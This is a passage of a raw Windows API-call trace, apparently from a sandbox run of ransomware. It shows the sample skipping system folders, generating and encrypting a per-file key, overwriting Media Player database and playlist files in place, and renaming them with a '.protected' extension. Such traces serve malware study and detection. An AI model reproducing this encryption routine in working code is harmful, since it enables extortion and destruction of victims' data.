returned 0 [0084.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.906] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.906] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.906] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.906] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\..") returned 73 [0084.906] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.906] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Windows") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files (x86)") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="$Recycle.bin") returned 1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="System Volume Information") returned -1 [0084.906] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrIW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".protected") returned 0x0 [0084.906] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0084.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.906] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".rar") returned 0x0 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".zip") returned 0x0 [0084.907] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.913] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.914] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.914] SetFilePointerEx (in: hFile=0x14c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.914] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.916] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.916] CloseHandle (hObject=0x14c) returned 1 [0084.916] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected") returned 105 [0084.916] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.protected")) returned 1 [0084.917] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Windows") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files (x86)") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="$Recycle.bin") returned 1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="System Volume Information") returned -1 [0084.917] wnsprintfW (in: pszDest=0x504c48, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.917] StrStrIW (lpFirst="LocalMLS_3.wmdb", lpSrch=".protected") returned 0x0 [0084.917] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0084.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".rar") returned 0x0 [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".zip") returned 0x0 [0084.918] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.931] SetFilePointerEx (in: hFile=0x14c, 
liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.931] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.931] CloseHandle (hObject=0x14c) returned 1 [0084.931] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected") returned 96 [0084.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.protected")) returned 1 [0084.932] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="Windows") returned -1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", 
lpString2="Program Files") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files (x86)") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="$Recycle.bin") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="System Volume Information") returned -1 [0084.932] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 85 [0084.932] lstrcmpW (lpString1="Sync Playlists", lpString2=".") returned 1 [0084.932] lstrcmpW (lpString1="Sync Playlists", lpString2="..") returned 1 [0084.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned 87 [0084.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\.") returned 87 [0084.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\..") returned 88 [0084.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 91 [0084.933] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0084.933] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 93 [0084.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.934] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0084.934] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\.") returned 93 [0084.934] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\..") returned 94 [0084.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Windows") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="System Volume Information") returned -1 
[0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned 100 [0084.935] lstrcmpW (lpString1="0000E713", lpString2=".") returned 1 [0084.935] lstrcmpW (lpString1="0000E713", lpString2="..") returned 1 [0084.935] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*") returned 102 [0084.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\.") returned 102 [0084.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.940] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") 
returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\..") returned 103 [0084.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.940] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.940] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.940] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.941] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0084.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0084.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.943] CloseHandle (hObject=0x158) returned 1 [0084.943] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 145 [0084.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0084.943] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.944] lstrcmpiW 
(lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.944] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.944] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.944] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.944] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.944] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.945] StrStrW 